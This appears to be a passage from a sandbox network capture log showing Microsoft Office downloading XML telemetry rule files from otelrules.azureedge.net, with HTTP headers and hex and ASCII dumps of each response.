                                                                                                                                      2024-11-29 22:11:27 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      84192.168.2.44983613.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:27 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:27 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 485
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                      ETag: "0x8DC582BB9769355"
                                                                                                                                      x-ms-request-id: d02045fe-401e-0064-2d26-4154af000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221127Z-174f7845968qj8jrhC1EWRh41s00000010kg0000000012a9
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:27 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      85192.168.2.44983713.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:27 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:27 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 411
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                      ETag: "0x8DC582B989AF051"
                                                                                                                                      x-ms-request-id: 02827f85-001e-00ad-7091-3f554b000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221127Z-174f7845968qj8jrhC1EWRh41s00000010eg00000000d4mv
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:27 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      86192.168.2.44983813.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:29 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:29 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 470
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                      ETag: "0x8DC582BBB181F65"
                                                                                                                                      x-ms-request-id: 6dbf519d-601e-0084-1b91-3f6b3f000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221129Z-174f78459685m244hC1EWRgp2c000000109000000000h2m9
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:29 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      87192.168.2.44983913.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:29 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:29 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 427
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                      ETag: "0x8DC582BB556A907"
                                                                                                                                      x-ms-request-id: e12d29d9-601e-0001-6315-41faeb000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221129Z-174f7845968vqt9xhC1EWRgten00000010n00000000066ee
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:29 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      88192.168.2.44984113.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:29 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:29 UTC491INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:29 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 407
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                      ETag: "0x8DC582B9D30478D"
                                                                                                                                      x-ms-request-id: e0c123a1-301e-000c-48a2-42323f000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221129Z-174f7845968xlwnmhC1EWR0sv800000010a000000000ee5u
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:29 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      89192.168.2.44984013.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:29 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:29 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 502
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                      ETag: "0x8DC582BB6A0D312"
                                                                                                                                      x-ms-request-id: 454be365-001e-0065-3d29-410b73000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221129Z-174f78459684bddphC1EWRbht4000000108000000000crg8
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:29 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      90192.168.2.44984213.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:29 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:29 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 474
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                      ETag: "0x8DC582BB3F48DAE"
                                                                                                                                      x-ms-request-id: b4ece731-701e-0097-3213-42b8c1000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221129Z-174f7845968qj8jrhC1EWRh41s00000010hg000000003r6p
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:29 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      91192.168.2.44984413.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:31 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:31 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 408
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                      ETag: "0x8DC582BB9B6040B"
                                                                                                                                      x-ms-request-id: cf0a4750-201e-005d-5b07-42afb3000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221131Z-174f7845968cpnpfhC1EWR3afc0000001060000000007n80
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:31 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      92192.168.2.44984513.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:31 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:31 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 469
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                      ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                      x-ms-request-id: d3508ca6-601e-003d-4e91-3f6f25000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221131Z-174f7845968ljs8phC1EWRe6en00000010g00000000004y7
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:31 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      93192.168.2.44984613.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:31 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:31 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 416
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                      ETag: "0x8DC582BB5284CCE"
                                                                                                                                      x-ms-request-id: 3111ff0c-301e-001f-4971-40aa3a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221131Z-174f7845968vqt9xhC1EWRgten00000010fg00000000knub
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
